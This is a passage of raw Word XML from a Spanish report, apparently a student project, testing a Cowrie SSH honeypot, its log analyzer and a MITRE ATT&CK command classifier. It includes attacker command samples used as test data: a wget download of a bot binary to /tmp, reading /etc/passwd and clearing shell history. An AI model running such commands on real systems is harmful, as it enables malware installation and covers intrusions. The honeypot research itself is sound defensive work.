              <w:t xml:space="preserve">Rechazo (regla !admin)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rechazado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">oracle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1600"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rechazo (usuario no aceptado)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Rechazado</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">root</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Passw0rd!</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1600"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Acceso (regla root:*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Acceso concedido</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 10. Resultados de la prueba de autenticación.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez dentro, el sistema simulado respondió de forma verosímil a los comandos del atacante. El comando uname -a devolvió la identidad configurada («Linux web-prod-02 6.1.0-31-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.128-1 (2025-02-07) x86_64 GNU/Linux»), cat /etc/passwd mostró un fichero de usuarios falso, whoami respondió root y /proc/cpuinfo describió un procesador Intel Xeon. El intento de descarga con wget falló, como se esperaba, porque el entorno de prueba no tenía salida a esa dirección, y el comando history -c se registró aunque el atacante lo usara para borrar su rastro.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Validación del Analizador con Datos Reales</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El script de análisis se había desarrollado y probado inicialmente con 500 sesiones generadas por generate_sample_logs.py. Esta prueba lo valida contra la salida real de Cowrie 3.1.0, para confirmar que los nombres de los eventos y sus campos coinciden con los que espera el script. El fichero cowrie.json generado por el ataque simulado contenía 58 eventos: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5557"/>
        <w:gridCol w:w="2381"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Tipo de evento</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Número</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.session.connect</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.session.closed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">11</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.client.version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.client.kex</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.command.input</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.login.failed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.login.success</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.client.size</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.session.params</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="3500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cowrie.log.closed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1500"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240" w:before="60" w:line="360"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Tabla 11. Eventos registrados por Cowrie en el ataque simulado.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El analizador procesó el fichero sin errores y obtuvo 11 sesiones desde 1 IP, 5 intentos de autenticación (1 exitoso, un 20 %), 8 comandos y ninguna descarga completada, cifras que coinciden con la tabla anterior. Generó además las cinco gráficas y el informe de resumen. Esta prueba puso de manifiesto la limitación descrita en el capítulo de Implementación: la URL del wget fallido no aparecía en ninguna parte del informe. Tras añadir la función analyze_command_urls, el informe incluye una sección de URLs en comandos con esa dirección. Se volvió a ejecutar el análisis sobre los datos simulados para comprobar que la mejora no alteraba el resto de resultados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext/>
        <w:spacing w:after="240" w:before="240" w:line="360"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prueba del Clasificador MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">El clasificador se prueba con un conjunto de 33 casos recogido en el fichero test_mitre_mapping.py, que puede ejecutarse de nuevo cada vez que se modifiquen las reglas. Los casos incluyen los comandos típicos de los bots y, sobre todo, posibles falsos positivos: las expresiones regulares cortas son propensas a encontrar coincidencias donde no las hay.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16"/>
        <w:gridCol w:w="2937"/>
        <w:gridCol w:w="1985"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Comando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Riesgo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:shd w:fill="D9E2F3" w:color="D9E2F3" w:val="solid"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Técnicas obtenidas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1900"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">wget http://.../bot.x86 -O /tmp/bot</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1850"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Que la «w» se confunda con el comando w (T1033)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="pct" w:w="1250"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:line="276"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
